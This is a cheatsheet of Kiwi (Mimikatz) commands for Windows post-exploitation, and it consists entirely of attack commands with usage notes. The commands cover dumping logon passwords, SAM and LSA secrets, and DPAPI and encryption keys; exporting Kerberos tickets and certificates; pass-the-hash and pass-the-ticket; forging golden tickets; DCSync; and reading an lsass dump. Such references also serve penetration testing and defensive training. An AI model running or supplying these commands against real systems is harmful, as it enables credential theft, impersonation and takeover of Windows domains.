Kiwi (Mimikatz) Cheatsheet

General Commands

  1. Enable Debug Privileges:
    kiwi_cmd "privilege::debug"
    • Use: To enable debug privileges for the session, which is required for many Mimikatz operations.
  1. Log Operations:
    kiwi_cmd "log"
    • Use: To start logging operations.
    kiwi_cmd "log [log_file]"
    • Use: To read log operations from the specified log file.
    • Example: kiwi_cmd "log read.log"

Sekurlsa Commands

  1. Retrieve Logon Passwords:
    kiwi_cmd "sekurlsa::logonpasswords"
    • Use: To display all available logon passwords.
    kiwi_cmd "sekurlsa::logonPasswords full"
    • Use: To display detailed logon password information.
  1. Export Kerberos Tickets:
    kiwi_cmd "sekurlsa::tickets /export"
    • Use: To export all Kerberos tickets.
  1. Pass the Hash:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm_hash] /run:[command]"
    • Use: To perform a pass-the-hash attack.
    • Example: kiwi_cmd "sekurlsa::pth /user:Administrator /domain:example.com /ntlm:abc123... /run:cmd"

Kerberos Commands

  1. List and Export Tickets:
    kiwi_cmd "kerberos::list /export"
    • Use: To list and export Kerberos tickets.
  1. Pass the Ticket:
    kiwi_cmd "kerberos::ptt [ticket_file]"
    • Use: To pass a Kerberos ticket.
    • Example: kiwi_cmd "kerberos::ptt c:\\\\ticket.kirbi"
  1. Golden Ticket:
    kiwi_cmd "kerberos::golden /user:[username] /domain:[domain] /sid:[sid] /krbtgt:[krbtgt_hash] /ticket:[ticket_file]"
    • Use: To create and use a Golden Ticket.
    • Example: kiwi_cmd "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-... /krbtgt:123456... /ticket:golden.kirbi"

Crypto Commands

  1. Export Certificates and Keys:
    kiwi_cmd "crypto::certificates /export"
    • Use: To export certificates.
    kiwi_cmd "crypto::keys /export"
    • Use: To export cryptographic keys.

Vault and LSADump Commands

  1. Retrieve Credentials from Windows Vault:
    kiwi_cmd "vault::cred"
    • Use: To list credentials stored in Windows Vault.
  1. Elevate Token:
    kiwi_cmd "token::elevate"
    • Use: To elevate the current token privileges.
  1. Dump SAM Database:
    kiwi_cmd "lsadump::sam"
    • Use: To dump the SAM database for password hashes.
  1. Dump LSA Secrets:
    kiwi_cmd "lsadump::secrets"
    • Use: To dump LSA secrets.
  1. DC Sync:
    kiwi_cmd "lsadump::dcsync /user:[domain\\\\username] /domain:[domain]"
    • Use: To perform a DC Sync attack and retrieve hashes.
    • Example: kiwi_cmd "lsadump::dcsync /user:example\\\\krbtgt /domain:example.com"

Pass-the-Hash Commands

  1. Perform Pass-the-Hash with NTLM:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm_hash]"
    • Use: To perform a pass-the-hash attack using NTLM hash.
  1. Perform Pass-the-Hash with AES:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /aes256:[aes256_hash]"
    • Use: To perform a pass-the-hash attack using AES256 hash.

Miscellaneous Commands

  1. Retrieve Encryption Keys:
    kiwi_cmd "sekurlsa::ekeys"
    • Use: To list encryption keys.
  1. DPAPI Commands:
    kiwi_cmd "sekurlsa::dpapi"
    • Use: To interact with DPAPI (Data Protection API).
  1. Load Minidump:
    kiwi_cmd "sekurlsa::minidump [dmp_file]"
    • Use: To load a minidump file.
    • Example: kiwi_cmd "sekurlsa::minidump lsass.dmp"
  1. Kerberos Ticket Granting Ticket:
    kiwi_cmd "kerberos::tgt"
    • Use: To retrieve the TGT (Ticket Granting Ticket).
  1. Purge Tickets:
    kiwi_cmd "kerberos::purge"
    • Use: To purge all Kerberos tickets.

By replacing specific variable attributes with more generic placeholders and providing details on when to use each command, this cheatsheet should help in efficiently using kiwi_cmd for various post-exploitation tasks.